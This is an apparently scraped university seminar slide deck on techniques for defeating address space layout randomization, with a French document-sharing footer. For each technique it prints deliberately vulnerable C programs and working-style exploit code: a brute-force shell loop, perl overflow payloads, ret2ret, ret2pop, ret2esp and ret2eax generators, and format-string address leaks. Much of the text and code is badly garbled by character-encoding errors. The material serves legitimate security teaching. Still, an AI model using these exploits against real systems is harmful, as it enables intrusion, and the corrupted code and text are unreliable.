ASLR - Address Space Layout Randomization PDF

Computer Science, Informatik 4
Communication and Distributed Systems

ASLR
Address Space Layout Randomization
Seminar on Advanced Exploitation Techniques
Chair of Computer Science 4
RWTH Aachen
Tilo Mller
What is ASLR?
A securit! technolo"! to prevent exploitation of #uffer overflo$s
Most popular alternative% &onexecuta#le stac'
Ena#led #! default since (ernel )*+*,) -)../0 1 2ista 3eta ) -)..+0
Earlier third part! implementations% 4a5 -since )...0
o! does ASLR !ork?
AS6R 7 Address Space 6a!out Randomi8ation
Aim% 9ntroduce randomness into the address space of each instantiation
-)4 #its of a :)#it address are randomi8ed0
; Addresses of infiltrated shellcode are not predictive an!more
; Common Exploitation techniques fail< #ecause the place of the shellcode
is un'no$n
,
st
inst* )
st
inst*
bfaa2e58
bf9114c8
p
r
o
c
e
s
s

m
e
m
o
r
!
p
r
o
c
e
s
s

m
e
m
o
r
!
s
t
a
c
'
...
...
bfaa2e14
bfaa2e10
bf911484
bf911480
o! does ASLR !ork?
unsigned long getEBP(void) {
__asm__(movl %ebp,%eax);
}
int main(void) {
printf(EBP: %xn,getEBP());
}
getEBP.c
=emonstration%
! "#getEBP
EBP:bffff3b8
! "#getEBP
EBP:bffff3b8
ASL disabled!
! "#getEBP
EBP:bfaa2e58
! "#getEBP
EBP:bf9114c8
ASL enabled!
What is randomized?
>nl! the stac' and li#raries
e*"* not the heap< text< data and #ss se"ment
=emonstration%
! $at #pro$#self#maps % egrep &(lib$%'eap%sta$()&
)*)+,)))-)*).e))) r/-p )*)+,))) )):)) ) 0'eap1
b2e3e)))-b2fa3))) r-xp )))))))) )*:)4 4524647 #lib#i.*.#$mov#lib$-6"2"so
b2fa3)))-b2fa.))) r--p ))4+2))) )*:)4 4524647 #lib#i.*.#$mov#lib$-6"2"so
b2fa.)))-b2fa*))) r/-p ))4+*))) )*:)4 4524647 #lib#i.*.#$mov#lib$-6"2"so
bfa),)))-bfa66))) r/-p bffeb))) )):)) ) 0sta$(1
$at #pro$#self#maps % egrep &(lib$%'eap%sta$()&
)*)+,)))-)*).e))) r/-p )*)+,))) )):)) ) 0'eap1
b2,a))))-b2ee2))) r-xp )))))))) )*:)4 4524647 #lib#i.*.#$mov#lib$-6"2"so
b2ee2)))-b2ee*))) r--p ))4+2))) )*:)4 4524647 #lib#i.*.#$mov#lib$-6"2"so
b2ee*)))-b2eea))) r/-p ))4+*))) )*:)4 4524647 #lib#i.*.#$mov#lib$-6"2"so
bfa*.)))-bfa5b))) r/-p bffeb))) )):)) ) 0sta$(1
"#er#ie! of ASLR resistant e$p%oits
,* 3rute force
)* Return into nonrandomi8ed memor!
:* 4ointer redirectin"
4* Stac' divul"in" methods
/* Stac' ?u""lin" methods
More methods can be found in the paper (e.g. GOT hijacking or overwriting .dtors)
&' (ruteforce
Success of #ruteforce is #ased on%
The tolerance of an exploit to variations in the address space la!out
(e.g. how many NOs can be p!aced in the buffer)
Ho$ man! exploitation attempts can #e performed
(e.g. it is necessary that a network daemon restarts after crash)
Ho$ fast the exploitation attempts can #e performed
(e.g. !oca!!y vs. over network)
void f8n$tion(c"a# 9args) {
c"a# b8ff0+)5.1;
str$p:(b8ff, args);
}
int main(int arg$, c"a# 9argv01) {
f8n$tion(argv041);
#etu#n );
}
vuln.c
Example%
&' (ruteforce
)(* +
R941 #f***
4,-.
byte
)S* +
shell
code
***
&>4s
plausi#le
value
R941 #f***
shell
code
***
&>4s
R941 #f***
shell
code
***
&>4s
miss
miss
hit
& / 0
&' (ruteforce
Chance% , to )
)4
14.@+ 7 4.@+ ; ).4A attempts on avera"e
Solution% Bp"rade to a +4#it architecture
#! /bin/sh
$"ile 0 ) 1; do
"#v8ln ;"#exploit <i;
i=<((<i > 6)+*))
if 0 <i ?gt 4.22264. 1; t"en
i=)
fi
done;
9t ta'es a#out : minutes on a ,*/ CH8 C4B to "et the exploit $or'in"%
"""
@et8rn A,,ress: )xbfa7*5)4
"#br8tefor$e"s': line 5: 45)*4 Begmentation fa8lt
@et8rn A,,ress: )xbfa754)4
s'-7"4<
Examplar! #ruteforce attac'%
"#er#ie!
,* 3rute force
/' Return into non1randomized memory
not
randomi8ed
randomi8ed
; Exploitation Techniques%
ret)heap
ret)#ss
ret)data
ret)text
Stac'% parameters and d!namic local varia#les
Heap% d!namicall! created data structures -malloc0
3SS% uninitiali8ed "lo#al and static local varia#les
=ata% initiali8ed "lo#al and static local varia#les
Text% readonl! pro"ram code
/a' ret/te$t
The text re"ion is mar'ed readonl!
; it is ?ust possi#le to manipulate the pro"ram flo$
-advanced% #orro$ed code0
void p8bli$(c"a#9 args) {
c"a# b8ff0461;
str$p:(b8ff,args);
printf(p8bli$n);
}
void se$ret(void) {
printf(se$retn);
}
int main(int arg$, c"a#9 argv01) {
if (get8i,() == )) se$ret();
else p8bli$(argv041);
}
vuln.c
Example%
/a' ret/te$t
#! /bin/bash
"#v8ln ;perl -e &print CACx4.; print Cxfax*7x)+x)*C&;
e%&loit.s"
***
stac'
text
R94 1 .x.A.4A:fa
SD4 1 AAAA
#uff 1 AAAA
0x080483fa: void secret(void)
/b' ret/bss
c"a# globalb8f063.1;
void f8n$tion(c"a#9 inp8t) {
$'ar lo$alb8f063.1;
str$p:(lo$alb8f, inp8t);
str$p:(globalb8f, lo$alb8f);
}
int main(int arg$, c"a#99 argv) {
f8n$tion(argv041);
}
vuln.c
The #ss se"ment contains the uninitiali8ed "lo#al varia#les%
T$o #uffers are needed< one on the stac' and one in the #ss se"ment
/b' ret/bss
***
stac'
-randomi8ed0
#ss
-not
randomi8ed0
.x.A.4@/e.
AAAA
AAAA
0x080495e0:
"lo#al
#uff
local
#uff
shellcode
shellcode
AAAA
R94
SD4
/c' ret/data
/d' ret/heap
Similar to ret)#ss* Examples of vulnera#le code%
=ata% 9nitiali8ed "lo#al varia#les
Heap% =!namicall! created data structures
c"a#' globalb8f = CAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA;
c"a# lo$alb8f063.1;
str$p:(lo$alb8f, inp8t);
str$p:(globalb8f, lo$alb8f);
}
c"a# lo$al_b8ff063.1;
c"a# 9'eap_b8ff;
str$p:(lo$al_b8ff,inp8t);
'eap_b8ff = (c"a# 9) mallo$(siDeof(lo$al_b8ff));
str$p:('eap_b8ff,lo$al_b8ff);
}
"#er#ie!
,* 3rute force
0' *ointer redirectin2
Hardcoded strin"s are saved $ithin nonrandomi8ed areas
; 9t is possi#le to redirect a strin" pointer to another one
9nterestin" strin" pointers are ar"uments of system, execve, ...
Example%
int main(int arg$, c"a#9 args01) {
c"a# inp8t063.1;
c"a# 9$onf = Ctest -f E#"progr$C;
c"a# 9li$ense = CFGHB BIJFKA@E HB P@ILHMEM"""nC;
printf(li$ense);
str$p:(inp8t,args041);
if (s:stem($onf)) printf(CError: missing "progr$nC);
}
vuln.c
Coal% Execute system(THIS S!T"#$% IS...&'())
; system tries to execute THIS ; $rite a script called THIS< e*"*%
#! /bin/bash
#bin#bas'
***
stac'
data
input
Econf
Elicense
0x08048562
0x08048550
THIS S!T"#$%
IS ...
test *f
+,.-ro.rc
s:stem($onf)
=
s:stem(test -f E#"progr$)
***
stac'
data
input
Econf
Elicense
0x08048562
0x08048562
THIS S!T"#$%
IS ...
test *f
+,.-ro.rc
s:stem($onf)
=
s:stem(FGHB BIJFKA@E HB""")
AAAA
int main(int arg$, c"a#9 args01) {
c"a# inp8t063.1;
c"a# 9$onf = Ctest -f E#"progr$C;
c"a# 9li$ense = CFGHB BIJFKA@E HB P@ILHMEM"""nC;
printf(li$ense);
str$p:(inp8t,args041);
if (s:stem($onf)) printf(CError: missing "progr$nC);
}
vuln.c
#! /bin/sh
e$'o C#bin#s'C ! FGHB
$'mo, 222 FGHB
PAFG=":<PAFG
"#v8ln ;perl -e &print CACx63.; print Cx.6x*3x)+x)*Cx6&;
e%&loit.s"
"#er#ie!
,* 3rute force
4' Stack di#u%2in2 methods
#define SA struct sockaddr
int listenf,, $onnf,;
void f8n$tion(c"a#9 str) {
c"a# rea,b8f063.1;
c"a# /riteb8f063.1;
str$p:(rea,b8f,str);
sprintf(/riteb8f,rea,b8f);
/rite($onnf,,/riteb8f,strlen(/riteb8f));
}
c"a# line04)6+1;
st#uct so$(a,,r_in serva,,r;
ssiDe_t n;
listenf, = so$(et (AJ_HNEF, BIOP_BF@EAQ, ));
bDero(Rserva,,r, siDeof(serva,,r));
serva,,r"sin_famil: = AJ_HNEF;
serva,,r"sin_a,,r"s_a,,r = 'tonl(HNAMM@_ANS);
serva,,r"sin_port = 'tons(222.);
bin,(listenf,, (BA9)Rserva,,r, siDeof(serva,,r));
listen(listenf,, 4)6+);
fo#(;;) {
$onnf, = a$$ept(listenf,, (BA9)NTUU,NTUU);
/rite($onnf,,C! C,6);
n = rea,($onnf,, line, siDeof(line)-4);
line0n1 = );
f8n$tion(line);
$lose($onnf,);
}
}
vuln.c
Coal%
=iscover informations a#out
the address space la!out
4ossi#ilit! ,%
Stac' stethoscope
-,-roc,/-id0,stat0
4ossi#ilit! )%
Dormat strin" vulnera#ilities
4a' Stack stethoscope
Address of a process stac'Fs #ottom%
)A
th
item of ,-roc,/-id0,stat
The remainin" stac' can #e calculated< since offsets are constant
The statfile is reada#le #! ever! user per default%
0 dir ,-roc,1(-idof v23'),stat
*r**r**r** 4 5008*05*56 55:04 ,-roc,45356,stat
=isadvanta"e%Access to the machine is required
Advanta"e% AS6R is almost useless if one have this access
stac' #ottom
***
function
main
SD4
R94
read#uf
$rite#uf
constant offset
-#fe,4f:. G #fe,4A/A 7 +dA0
stac' #ottom
function
main
SD4
R94
read#uf
$rite#uf shellcode
s# offset
s# 7 cat ,-roc,1(-idof v23'),stat 7 a89 :; -ri't 158 <:
offset 7 6d8
***
4b' 3ormat strin2s
#define SA struct sockaddr
int listenf,, $onnf,;
c"a# rea,b8f063.1;
c"a# /riteb8f063.1;
str$p:(rea,b8f,str);
sprintf(/riteb8f,rea,b8f);
/rite($onnf,,/riteb8f,strlen(/riteb8f));
}
c"a# line04)6+1;
st#uct so$(a,,r_in serva,,r;
ssiDe_t n;
listenf, = so$(et (AJ_HNEF, BIOP_BF@EAQ, ));
bDero(Rserva,,r, siDeof(serva,,r));
serva,,r"sin_famil: = AJ_HNEF;
serva,,r"sin_a,,r"s_a,,r = 'tonl(HNAMM@_ANS);
serva,,r"sin_port = 'tons(222.);
bin,(listenf,, (BA9)Rserva,,r, siDeof(serva,,r));
listen(listenf,, 4)6+);
fo#(;;) {
$onnf, = a$$ept(listenf,, (BA9)NTUU,NTUU);
/rite($onnf,,C! C,6);
n = rea,($onnf,, line, siDeof(line)-4);
line0n1 = );
f8n$tion(line);
$lose($onnf,);
}
}
vuln.c
H Dormat strin" vulnera#ilit!<
that can #e used to receive
stac' addresses
Correct%
s-ri'tf(8rite=2f,(>s(,read=2f))
Advanta"e%
&o access to the machine is
required*
s
p
r
i
n
t
f
-
0
f
u
n
c
t
i
o
n
-
0
SD4
R94
I).Jx
***
***
#f#K,ecA
).
th
parameter a#ove the format strin"
***
stac' #ottom
constant offset
=f=?5550 * =f=?4ec8 @ 688
4b' 3ormat strin2s
; The stac' #ottom can #e calculated #! an
exploitation of the format strin" vulnera#ilit!
; After$ards the exploit from the stethoscope
attac' can #e used a"ain
Example%
0 ecAo B>50&1xB 7 &
0 'c 3oca3Aost ???6
0 =f=?4ec8
"#er#ie!
,* 3rute force
3ased on a pointer that is a potentia! pointer to the shellcode*
S3*
RI*
#uff
*ointer
***
4a' ret/ret
A potential pointer points to the shellcode if its last si"nificant #!te is
over$ritten #! 8ero -strin" termination0*
3ut ho$ to use this ali"ned pointer as return instruction pointerL
LL
*ointer $,,
LL
#uff
&>4s
***
shellcode
***
4a' ret/ret
Solution% chain of retFs*
ret can #e found in the text se"ment -$hich is not randomi8ed0
5ret
*ointer $,,
5ret
#uff
&>4s
***
shellcode
***
4a' ret/ret
5ret
*ointer $,,
5ret
#uff
&>4s
***
shellcode
***
4a' ret/ret
)S* +
)I* +
)(* +
#-0
a-0
leave
= movl %ebp,%esp
popl %ebp
ret
= popl %eip
function eplio"ue of #%
5ret
*ointer $,,
5ret
#uff
&>4s
***
shellcode
***
4a' ret/ret
)S* +
)I* +
)(* +
#-0
a-0
leave
= movl %ebp,%esp
popl %ebp
ret
= popl %eip
5ret
*ointer $,,
5ret
#uff
&>4s
***
shellcode
***
4a' ret/ret
)S* +
)I* +
)(* + ???
#-0
a-0
leave
= movl %ebp,%esp
popl %ebp
ret
= popl %eip
5ret
*ointer $,,
5ret
#uff
&>4s
***
shellcode
***
4a' ret/ret
)S* +
)I* +
)(* + ???
#-0
a-0
leave
= movl %ebp,%esp
popl %ebp
ret
= popl %eip
5ret
*ointer $,,
5ret
#uff
&>4s
***
shellcode
***
4a' ret/ret
)S* +
)I* +
)(* + ???
#-0
a-0
leave
= movl %ebp,%esp
popl %ebp
ret
= popl %eip
5ret
*ointer $,,
5ret
#uff
&>4s
***
shellcode
***
4a' ret/ret
)S* +
)I* +
)(* + ???
#-0
a-0
leave
= movl %ebp,%esp
popl %ebp
ret
= popl %eip
5ret
*ointer $,,
5ret
#uff
6"*s
***
shellcode
***
4a' ret/ret
)S* +
)I* +
)(* + ???
#-0
a-0
leave
= movl %ebp,%esp
popl %ebp
ret
= popl %eip
5ret
*ointer $,,
5ret
#uff
6"*s
***
she%%code
***
4a' ret/ret
)S* +
)I* +
)(* + ???
#-0
a-0
leave
= movl %ebp,%esp
popl %ebp
ret
= popl %eip
vuln.c
#define RET 0x0804840f
int main(void) {
c"a# 9b8ff, 9ptr;
long 9a,r_ptr;
int b8f_siDe = 6*);
int ret_siDe = 6);

b8ff = mallo$(b8f_siDe);
ptr = b8ff;
a,r_ptr = (long 9) ptr;
fo# (i=); iVb8f_siDe; i>=+)
9(a,r_ptr>>) = @EF;
fo# (i=); iVb8f_siDe-ret_siDe; i>>)
b8ff0i1 = NIP;
ptr = b8ff >
(b8f_siDe-ret_siDe-
strlen(s'ell$o,e));
fo# (i=); iVstrlen(s'ell$o,e); i>>)
9(ptr>>) = s'ell$o,e0i1;

b8ff0b8f_siDe1 = &)&;
printf(C%sC,b8ff);
#etu#n );
}
e%&loit.c
void f8n$tion(c"a#9 overflo/) {
c"a# b8ffer063.1;
str$p:(b8ffer, overflo/);
}
int no = 4;
int9 ptr = Rno;
f8n$tion(argv041);
#etu#n 4;
}
4a' ret/ret
After strc-y the shellcode is stored redundant in the memor!*
9dea% Bse a perfect pointer to the shellcode placed in ar.v*
S3*
RI*
#uff
*ointer
ar2#
shellcode
'''
4b' ret/pop
)I* 7
4ro#lem% Avoid over$ritin" the last si"nificant #!te of the perfect pointer
#! 8ero*
S3*
RI*
#uff
ar2#
*ointer $,,
5
4b' ret/pop
'''
shellcode
Solution% A retchain follo$ed #! -o-*ret.
The pop instruction s'ips over the memor! location $hich is over$ritten
#! 8ero*
***
5ret
#uff
*ointer
$,,
shellcode
5pop1ret
***
4b' ret/pop
ar2#
'''
shellcode
vuln.c
#define POPRET 0x0804846
#define RET 0x08048468
int main(void) {
c"a# 9b8ff, 9ptr;
long 9a,r_ptr;
int i;

b8ff = mallo$(6.+);
fo# (i=); iV6.+; i>>)
b8ff0i1 = &A&;

ptr = b8ff>6.);
a,r_ptr = (long 9) ptr;
fo# (i=6.); iV6.+; i>=+)
if (i == 6.)) 9(a,r_ptr>>) = PIP@EF;
else 9(a,r_ptr>>) = @EF;
ptr = b8ff;

b8ff06.+1 = &)&;
printf(C%sC,b8ff);
#etu#n );
}
int f8n$tion(int x, c"a# 9str) {
c"a# b8f063.1;
str$p:(b8f,str);
#etu#n x;
}
int main(int arg$, c"a# 99argv) {
f8n$tion(.+, argv041);
#etu#n 4;
}
e%&loit.c
4b' ret/pop
The position of the ES4 is predicta#le durin" the function epilo"ue*
; ?mp 9%esp
)(* 8
)S* 8
S3*
RI*
#uff
4c' ret/esp
The position of the ES4 is predicta#le durin" the function epilo"ue*
; ?mp 9%esp
)(* 8
)S* 8
***
#uff
shellcode
***
4c' ret/esp
M?mp EIesp
)(* 8
)S* 8
***
#uff
shellcode
***
4c' ret/esp
leave
= movl %ebp,%esp
popl %ebp
ret
= popl %eip
stac'
text se"ment
f8n$tion epilog8e:
9 )I*
Wmp 9esp
some/'ere:
***
M?mp EIesp
***
)(* 8 )S* 8 ***
#uff
shellcode
***
4c' ret/esp
leave
= movl %ebp,%esp
popl %ebp
ret
= popl %eip
stac'
text se"ment
f8n$tion epilog8e:
9 )I*
Wmp 9esp
some/'ere:
M?mp EIesp
)(* 8 ?
)S* 8
***
#uff
shellcode
***
4c' ret/esp
leave
= movl %ebp,%esp
popl %ebp
ret
= popl %eip
stac'
text se"ment
f8n$tion epilog8e:
9 )I*
Wmp 9esp
some/'ere:
***
M?mp EIesp
***
)S* 8
***
#uff
shellcode
***
4c' ret/esp
leave
= movl %ebp,%esp
popl %ebp
ret
= popl %eip
stac'
text se"ment
f8n$tion epilog8e:
9 )I*
Wmp 9esp
some/'ere:
)(* 8 ?
***
M?mp EIesp
***
)S* 8
***
M?mp EIesp
#uff
shellcode
***
4c' ret/esp
leave
= movl %ebp,%esp
popl %ebp
ret
= popl %eip
stac'
text se"ment
f8n$tion epilog8e:
)I* 8
Wmp 9%esp
some/'ere:
)(* 8 ?
4c' ret/esp
4ro#lem% Cm- D>es- is not produced #! "cc
Solution% Search the hexdump of a #inar! after e4ff<
$hich $ill #e interpreted as Cm- D>es-*
Example% The hardcoded num#er 58653
dec
@ e4ff
Aex
The chance to find e4ff in practice is increased #! the si8e of a
#inra!*
0 Aexd2m- ,2sr,=i',D 7 .re- e4ff 7 8c *3
4483
#define !"P#ESP 0x08048$e8
int main(void) {
c"a# 9b8ff, 9ptr;
long 9a,r_ptr;
int i;

b8ff = mallo$(6.+);
ptr = b8ff;
a,r_ptr = (long 9)ptr;
fo# (i=); iV6.+>strlen(s'ell$o,e); i>=+)
9(a,r_ptr>>) = XQP6EBP;

ptr = b8ff>6.+;

b8ff06.+>strlen(s'ell$o,e)1 = &)&;
printf(C%sC,b8ff);
#etu#n );
}
void f8n$tion($'ar9 str) {
c"a# b8f063.1;
str$p:(b8f,str);
}
int W = 3*.67;
f8n$tion(argv041);
#etu#n 4;
}
vuln.c
e%&loit.c
4c' ret/esp
Return values are stored in EA5*
; EA5 could contain a perfect shellcode pointer after a function
returns a pointer to user input*
; >ver$rite R94 #! a pointer to a ca33 D>eax instr8$tion
Example:
strc-y(=2f,str) returns a pointer to =2f< i*e*
=2f-tr @ strc-y(=2f,str))
effects EA5 and =2f-tr to point to the same location as =2f
4d' ret/ea$
vuln.c
voi, f8n$tion($'ar9 str) {
$'ar b8f063.1;
str$p:(b8f, str);
}
int main(int arg$, $'ar 99argv) {
f8n$tion(argv041);
ret8rn 4;
}
)(* 8
)S* 8
RI*
S3*
#uf
4d' ret/ea$
)A: 7 ?
$'ar b8f063.1;
str$p:(b8f, str);
}
f8n$tion(argv041);
ret8rn 4;
}
m
a
i
n
-
0
f
u
n
c
t
i
o
n
-
0
)(* 8
)S* 8
RI*
S3*
#uf
4d' ret/ea$
)A: 7 ?
$'ar b8f063.1;
str$p:(b8f, str);
}
f8n$tion(argv041);
ret8rn 4;
}
m
a
i
n
-
0
f
u
n
c
t
i
o
n
-
0
s
t
r
c
p
!
-
0
***
SD4
R94
)(* 8
)S* 8
#uf
4d' ret/ea$
)A: 7 ?
$'ar b8f063.1;
str$p:(b8f, str);
}
f8n$tion(argv041);
ret8rn 4;
}
m
a
i
n
-
0
f
u
n
c
t
i
o
n
-
0
s
t
r
c
p
!
-
0
***
SD4
R94
Mcall EIeax
shellcode
***
***
***
)(* 8
)S* 8
#uf
4d' ret/ea$
)A: +
$'ar b8f063.1;
str$p:(b8f, str);
}
f8n$tion(argv041);
ret8rn 4;
}
m
a
i
n
-
0
f
u
n
c
t
i
o
n
-
0
shellcode
***
***
***
Mcall EIeax
)(* 8
)S* 8
#uf
4d' ret/ea$
)A: +
$'ar b8f063.1;
str$p:(b8f, str);
}
f8n$tion(argv041);
ret8rn 4;
}
m
a
i
n
-
0
f
u
n
c
t
i
o
n
-
0
shellcode
***
***
***
leave
= movl %ebp,%esp
popl %ebp
ret
= popl %eip
9 )I*
Mcall EIeax
)(* 8 )S* 8
#uf
4d' ret/ea$
)A: +
$'ar b8f063.1;
str$p:(b8f, str);
}
f8n$tion(argv041);
ret8rn 4;
}
m
a
i
n
-
0
f
u
n
c
t
i
o
n
-
0
shellcode
***
***
***
leave
= movl %ebp,%esp
popl %ebp
ret
= popl %eip
9 )I*
Mcall EIeax
)(* 7 ?
)S* 8
#uf
4d' ret/ea$
)A: +
$'ar b8f063.1;
str$p:(b8f, str);
}
f8n$tion(argv041);
ret8rn 4;
}
m
a
i
n
-
0
f
u
n
c
t
i
o
n
-
0
shellcode
***
***
***
leave
= movl %ebp,%esp
popl %ebp
ret
= popl %eip
9 )I*
Mcall EIeax
)(* 7 ?
)S* 8
#uf
4d' ret/ea$
)A: +
$'ar b8f063.1;
str$p:(b8f, str);
}
f8n$tion(argv041);
ret8rn 4;
}
m
a
i
n
-
0
f
u
n
c
t
i
o
n
-
0
shellcode
***
***
***
Mcall EIeax
leave
= movl %ebp,%esp
popl %ebp
ret
= popl %eip
9 )I*
$all 9%eax
)(* 7 ?
)S* 8
#uf
4d' ret/ea$
)A: +
$'ar b8f063.1;
str$p:(b8f, str);
}
f8n$tion(argv041);
ret8rn 4;
}
m
a
i
n
-
0
f
u
n
c
t
i
o
n
-
0
shellcode
***
***
***
Mcall EIeax
leave
= movl %ebp,%esp
popl %ebp
ret
= popl %eip
$all 9%eax
)I* +
)(* 7 ?
)S* 8
#uf
4d' ret/ea$
)A: +
$'ar b8f063.1;
str$p:(b8f, str);
}
f8n$tion(argv041);
ret8rn 4;
}
m
a
i
n
-
0
f
u
n
c
t
i
o
n
-
0
shellcode
***
***
***
Mcall EIeax
leave
= movl %ebp,%esp
popl %ebp
ret
= popl %eip
$all 9%eax
)I* +
vuln.c
#define %A&&EA' 0x080484($
int main(void) {
c"a# 9b8ff, 9ptr;
long 9a,r_ptr;

b8ff = mallo$(6.+);
ptr = b8ff;
a,r_ptr = (long 9)ptr;
fo# (i=); iV6.+; i>=+)
9(a,r_ptr>>) = OAUUEAY;

ptr = b8ff;

b8ff06.+1 = &)&;
printf(C%sC,b8ff);
}
e%&loit.c
c"a# b8f063.1;
str$p:(b8f, str);
}
int main(int arg$, c"a# 99argv) {
f8n$tion(argv041);
}
4d' ret/ea$
! obW,8mp -M v8ln % grep -B 6 C$allC
*)+*++f: 2+ 46 We *)+*+.7
*)+*+34: 74 ,b xor %ebx,%ebx
*)+*+37: ff ,) $all 9%eax
(ind )call '*ea%!
Summary
,* 3rute force
a0 ret)text
#0 ret)#ss
c0 ret)data
d0 ret)heap
a0 Strin" pointer
a0 Stac' stethoscope
#0 Dormatstrin" vulnera#ilities
a0 ret)ret
#0 ret)pop
c0 ret)esp
d0 ret)eax
Summary
,* 3rute force
a0 ret)text
#0 ret)#ss
c0 ret)data
d0 ret)heap
a0 Strin" pointer
a0 Stac' stethoscope
#0 Dormatstrin" vulnera#ilities
a0 ret)ret
#0 ret)pop
c0 ret)esp
d0 ret)eax
Additional in the paper%
=oS #! format strin" vulnera#ilities
Redirectin" function pointers
9nte"er overflo$s
C>T and 46T hi?ac'in"
>ff #! one
>ver$ritin" *dtors

ASLR - Address Space Layout Randomization PDF

Transféré par

Informations du document

Titre original

Copyright

Formats disponibles

Partager ce document

Partager ou intégrer le document

Options de partage

Avez-vous trouvé ce document utile ?

Ce contenu est-il inapproprié ?

Droits d'auteur :

Formats disponibles

ASLR - Address Space Layout Randomization PDF

Transféré par

Droits d'auteur :

Formats disponibles

Computer Science, Informatik 4

Communication and Distributed Systems

Vous aimerez peut-être aussi